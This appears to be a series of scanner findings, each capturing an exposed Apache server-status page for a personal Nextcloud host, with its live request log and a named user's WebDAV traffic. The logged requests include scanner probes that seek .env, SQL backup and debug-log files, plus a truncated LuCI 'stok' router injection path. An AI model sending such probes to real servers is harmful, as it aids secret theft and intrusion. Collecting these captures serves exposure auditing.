103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.0013381691388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.0013381692368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.00133816908696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.00133816908189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.00133816908564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.0013381691358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.00133816918564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.00133816908583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-29925224930/8/5311_ 1.9433639185730.00.0582.08 167.172.232.142http/1.1 1-29925224930/5/5385_ 1.743311879412140.00.0398.59 167.94.145.97http/1.1 1-29925224930/10/5375_ 2.0665551368774030.00.0593.66 34.65.17.201http/1.1 1-29925224930/11/5481_ 1.9621369068330.00.0656.15 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29925224930/11/5425_ 2.0521829178910.00.0879.94 57.129.23.166http/1.1 1-29925224930/12/5318_ 2.1933129302740.00.0792.48 167.94.145.97http/1.1localhost:80GET / HTTP/1.1 1-29925224930/9/5398_ 2.2221488956540.00.0857.33 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-29925224930/6/5433_ 2.09309097840.00.05131.03 167.172.232.142http/1.1 1-29925224930/10/5453_ 2.2021968899370.00.0492.63 167.172.232.142http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-29925224930/8/5422_ 2.1735381439289820.00.0557.39 185.223.93.161http/1.1ravignon.mycloud.paris:443GET /wgcgi.cgi HTTP/1.1 1-29925224930/8/5369_ 2.1265501468697970.00.0593.30 34.65.17.201http/1.1ravignon.mycloud.paris:443OPTIONS / HTTP/1.0 1-29925224930/9/5298_ 1.90544416809181780.00.0495.46 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29925224930/10/5438_ 1.9865501709172590.00.07106.11 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29925224930/9/5358_ 2.07655011778935740.00.0592.62 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29925224930/11/5375_ 2.1254443149098270.00.0593.31 80.82.77.202http/1.1localhost:80\x16\x03\x02\x01o\x01 1-29925224930/10/5258_ 2.13390908932920.00.0591.45 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-29925224930/13/5414_ 2.13415019286690.00.0987.92 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-29925224930/9/5251_ 1.9141451798733330.00.0595.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29925224930/8/5291_ 1.50390908748930.00.04125.42 57.129.23.166http/1.1 1-29925224930/10/5303_ 2.18199710311737800.00.0978.56 78.128.112.205http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-29925224930/9/5318_ 2.023538958923880.00.05101.48 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29925224930/8/5269_ 2.084145699176220.00.04112.81 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29925224930/11/5431_ 2.0319971379166590.00.0796.80 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/noti
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805cd1c1e47
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 14-Sep-2024 11:20:52 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 298 Parent Server MPM Generation: 297 Server uptime: 295 days 4 hours 21 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 454597 - Total Traffic: 8.3 GB - Total Duration: 75186915 CPU Usage: u843.27 s1657.36 cu3267.97 cs1039.53 - .0267% CPU load .0178 requests/sec - 350 B/second - 19.2 kB/request - 165.392 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12514090no0yes025000 32514091no0yes124000 Sum200 149000 ........................._________________________.............. ...........________________W________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.00116405008720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.00116405018059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.00116405008496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.00116405008377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.00116405028579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.00116405008636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.00116405008343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.0011640502448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.00116405028456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.0011640501378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.0011640501348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.00116405008281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.0011640502638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.00116405008614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.00116405008573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.0011640502539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.0011640501348670760.00.00128.73 103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.0011640501388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.0011640502368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.00116405008696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.00116405008189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.00116405008564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.0011640501358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.00116405018564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.00116405008583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-29725140900/7/5289_ 1.4411559153170.00.0781.87 159.223.132.86http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-29725140900/7/5369_ 1.32227809363830.00.0598.51 172.104.137.47http/1.1 1-29725140900/9/5349_ 1.4421598728830.00.0593.51 159.223.132.86http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-29725140900/9/5457_ 1.36419010950.00.0556.00 159.223.132.86h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-29725140900/4/5406_ 1.33409138140.00.0179.72 172.104.137.47http/1.1localhost:80GET /indice.aspx HTTP/1.1 1-29725140900/8/5295_ 1.4241479265000.00.0892.27 159.223.132.86http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-29725140900/11/5380_ 1.36208926110.00.0757.16 159.223.132.86http/1.1 1-29725140900/6/5414_ 1.32129080230.00.07130.86 172.104.137.47http/1.1 1-29725140900/5/5429_ 1.35227908876430.00.0592.52 172.104.137.47http/1.1 1-29725140900/11/5406_ 1.32009274350.00.1157.28 172.104.137.47http/1.1 1-29725140900/7/5351_ 1.32227608671870.00.0493.13 172.104.137.47http/1.1 1-29725140900/10/5282_ 1.450639145790.00.1395.38 159.223.132.86http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-29725140900/11/5418_ 1.33309129290.00.05103.02 159.223.132.86http/1.1 1-29725140900/5/5340_ 1.33227508906870.00.0292.52 172.104.137.47http/1.1 1-29725140900/4/5358_ 1.450679045210.00.0393.20 159.223.132.86http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-29725140900/9/5240_ 1.32008902850.00.0691.34 172.104.137.47http/1.1 1-29725140900/8/5388_ 1.32227609238760.00.0187.67 172.104.137.47http/1.1 1-29725140900/8/5231_ 1.35227708682530.00.1095.72 172.104.137.47http/1.1 1-29725140900/11/5274_ 1.32108720770.00.07125.34 172.104.137.47http/1.1 1-29725140900/7/5283_ 1.322279011712640.00.0178.35 172.104.137.47http/1.1 1-29725140900/6/5297_ 1.35227908883940.00.0198.39 172.104.137.47http/1.1 1-29725140900/8/5254_ 1.33227509156990.00.07112.70 172.104.137.47http/1.1 1-29725140900/5/5410_ 1.35227509082660.00.0596.68 172.104.137.47http/1.1 1-29725140900/6/5259_ 1.35228109175000.00.0553.01 172.104.137.47http/1.1localhost:80GET /localstart.asp HTTP/1.1 1-29725140900/10/5350_ 1.35227528899670.00.0979.20 172.104.137.47http/1.1 2-283-0/0/2318. 0.00116405023334110.00.0024.70 <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480556f93194
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 12-Sep-2024 15:30:10 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 296 Parent Server MPM Generation: 295 Server uptime: 293 days 8 hours 30 minutes 30 seconds Server load: 0.15 0.07 0.01 Total accesses: 451536 - Total Traffic: 8.3 GB - Total Duration: 74716441 CPU Usage: u852.29 s1651.02 cu3229.81 cs1027.31 - .0267% CPU load .0178 requests/sec - 351 B/second - 19.3 kB/request - 165.472 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12505394no0yes124000 32505395no1yes025001 Sum201 149001 ........................._W_______________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.00100620708720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.00100620718059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.00100620708496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.00100620708377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.00100620728579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.00100620708636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.00100620708343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.0010062072448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.00100620728456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.0010062071378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.0010062071348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.00100620708281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.0010062072638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.00100620708614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.00100620708573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.0010062072539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.0010062071348670760.00.00128.73 103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.0010062071388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.0010062072368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.00100620708696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.00100620708189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.00100620708564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.0010062071358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.00100620718564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.00100620708583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-29525053940/35/5240_ 10.541571079067870.02.3181.54 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29525053941/40/5325W 10.03009306300.00.2497.96 157.245.105.107http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-29525053940/36/5296_ 10.5101878637100.04.6893.20 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/36/5403_ 10.571688931040.00.2155.69 157.245.105.107http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-29525053940/42/5351_ 10.47321809047150.00.2679.39 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/46/5248_ 10.5801389186510.00.2791.97 157.245.105.107http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-29525053940/49/5333_ 10.4012038876740.00.2756.89 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/35/5364_ 10.571818980960.00.16130.51 157.245.105.107http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-29525053940/43/5381_ 10.29151818805330.00.2492.21 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/47/5353_ 10.5637769199660.00.2856.92 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29525053940/36/5309_ 10.49322378607080.00.1992.90 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/33/5232_ 10.3032639047000.04.6995.01 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/40/5369_ 10.522171079051960.00.22102.72 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29525053940/39/5291_ 10.36212958834150.05.0792.23 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29525053940/40/5310_ 10.41241678973060.00.2692.94 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29525053940/33/5187_ 10.44152948847860.00.1991.03 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/51/5337_ 10.541571079171610.00.4587.40 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29525053940/39/5188_ 10.262121528627110.05.0595.41 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29525053940/40/5234_ 10.5637808667840.00.23125.11 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29525053940/48/5225_ 10.4615118111622990.00.4078.02 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-295
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48053e22c0e8
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Tuesday, 10-Sep-2024 17:41:17 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 294 Parent Server MPM Generation: 293 Server uptime: 291 days 10 hours 41 minutes 38 seconds Server load: 0.08 0.02 0.01 Total accesses: 446733 - Total Traffic: 8.2 GB - Total Duration: 73720934 CPU Usage: u845.5 s1639.02 cu3193.07 cs1015.76 - .0266% CPU load .0177 requests/sec - 350 B/second - 19.3 kB/request - 165.022 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12496639no0yes025000 32496640no0yes124000 Sum200 149000 ........................._________________________.............. ...........____W____________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.0084127408720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.0084127418059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.0084127408496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.0084127408377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.0084127428579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.0084127408636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.0084127408343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.008412742448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.0084127428456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.008412741378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.008412741348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.0084127408281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.008412742638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.0084127408614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.0084127408573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.008412742539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.008412741348670760.00.00128.73 103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.008412741388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.008412742368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.0084127408696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.0084127408189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.0084127408564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.008412741358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.0084127418564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.0084127408583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-29324966390/39/5153_ 8.5722901538909540.00.2478.85 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/42/5227_ 8.8022951679161580.00.2697.35 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29324966390/39/5210_ 8.6019431418386400.00.2288.19 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-29324966390/39/5299_ 8.81202348716490.00.2554.98 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 1-29324966390/38/5244_ 8.6019421618845470.00.2078.49 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/38/5151_ 8.192018999009500.00.2391.38 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29324966390/38/5235_ 8.753581638714690.00.2356.33 143.198.30.131http/1.1 1-29324966390/36/5267_ 8.4916442218821790.00.27129.16 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/33/5273_ 8.5025302158625000.00.1991.43 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/36/5243_ 8.82164908973230.00.2555.92 141.255.160.234http/1.1localhost:80POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&c 1-29324966390/41/5204_ 8.81194808426500.00.2391.96 185.191.126.213http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-29324966390/39/5135_ 8.6325301638833140.00.2689.95 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29324966390/35/5276_ 8.3925006468869590.00.25102.14 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/40/5190_ 8.6216442428626220.00.2486.77 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/37/5207_ 8.7724451918754140.00.2092.21 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/38/5088_ 8.5324401048578700.00.2390.29 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/33/5220_ 8.7525052168887910.00.3386.51 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/47/5090_ 8.6525001608381150.00.3181.33 4.151.38.125http/1.1ravignon.mycloud.paris:443GET /actuator/health HTTP/1.1 1-29324966390/35/5132_ 8.7823851838503290.00.20123.83 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/35/5105_ 8.80229517711390940.00.2276.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-29324966390/33/5158_ 8.5423801558661790.00.2196.8
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805084ae2af
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 26-May-2024 19:56:22 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 187 Parent Server MPM Generation: 186 Server uptime: 184 days 12 hours 56 minutes 43 seconds Server load: 0.00 0.00 0.00 Total accesses: 303906 - Total Traffic: 6.1 GB - Total Duration: 53861074 CPU Usage: u535.82 s1053.48 cu2234.99 cs720.38 - .0285% CPU load .0191 requests/sec - 412 B/second - 21.1 kB/request - 177.229 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02043761no0yes124000 32043762no0yes025000 Sum200 149000 __________________W______....................................... ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" 